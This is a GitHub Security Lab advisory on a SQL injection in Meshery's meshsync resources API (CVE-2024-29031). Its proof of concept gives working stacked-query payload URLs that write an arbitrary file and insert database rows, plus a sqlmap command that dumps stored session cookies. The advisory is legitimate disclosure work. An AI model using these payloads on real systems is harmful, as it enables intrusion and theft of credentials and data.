Coordinated Disclosure Timeline
- 2023-12-13: Vulnerability Report Sent
- 2023-12-14: Vulnerability acknowledged by Meshery maintainers
- 2024-02-06: Vulnerability patched.
Summary
A SQL injection vulnerability in Meshery up to v0.6.181 allows a remote attacker to obtain sensitive information via the order parameter of GetMeshSyncResources.
Product
Meshery
Tested Version
Details
SQL injection in GetMeshSyncResources (GHSL-2023-249)
The Meshery project exposes the function GetMeshSyncResources at the API URL /api/system/meshsync/resources. The order query parameter is directly used to build a SQL query in line 135 of the meshync_handler.go file, as it can be seen in the following snippet:
func (h *Handler) GetMeshSyncResources(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {
// --snip--
order := r.URL.Query().Get("order")
sort := r.URL.Query().Get("sort")
// --snip--
result := provider.GetGenericPersister().Model(&model.KubernetesResource{}).
Preload("KubernetesResourceMeta")
// --snip--
if order != "" {
if sort == "desc" {
// --snip--
} else {
result = result.Order(order)
}
}
err := result.Find(&resources).Error
// --snip--
}
Impact
This issue may lead to arbitrary file write by using a SQL injection stacked queries payload, and the ATTACH DATABASE command.
Additionally, attackers may be able to access and modify any data stored in the database, like performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system.
Arbitrary data read and write may be a problem depending on several factors:
- Whether there’s user authentication (if not, unauthenticated users may access the data querying the API normally).
- Whether there’s user authorization (if not, authenticated users may be able to access all data querying the API normally).
- Whether there’s actual sensitive data, like session cookies or credentials, added to Meshery (depends on the configuration).
Proof of Concept
To reproduce this issue, the following three requests can be used to write a file at an arbitrary location with arbitrary contents (note that an appropriate cookie needs to be used in the request, for local authentication use Cookie: meshery-provider=None):
http://(server):9081/api/system/meshsync/resources?order=1%3bATTACH+DATABASE+'/tmp/test'+AS+test--
http://(server):9081/api/system/meshsync/resources?order=1%3bCREATE+TABLE+test.pwn+(dataz+text)--
http://(server):9081/api/system/meshsync/resources?order=1%3bINSERT+INTO+test.pwn+(dataz)+VALUES+("pwned")--
Verify that the test file was created:
cat /tmp/test
pwned
Also, arbitrary database entries can be created by issuing a request to the following URL:
http://(server):9081/api/system/meshsync/resources?order=1%3bINSERT+INTO+performance_profiles+(metadata)+VALUES+("injected+data")--
To extract information from the database, blind SQL injection techniques must be used. For instance, we could use sqlmap to automate the process of dumping the request cookies used in a performance profile:
$ sqlmap -u 'http://(victim server):9081/api/system/meshsync/resources?order=1*' --technique S --dbms SQLite --header "Cookie: meshery-provider=None" --drop-set-cookie --ignore-code=500 --batch -T performance_profiles -C request_cookies --dump
..snip..
Table: performance_profiles
[1 entry]
+---------------------------+
| request_cookies |
+---------------------------+
| {"Session": "test_value"} |
+---------------------------+
CVE
- CVE-2024-29031
Credit
This issue was discovered and reported by GitHub CodeQL team member @atorralba (Tony Torralba).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-249 in any communication regarding this issue.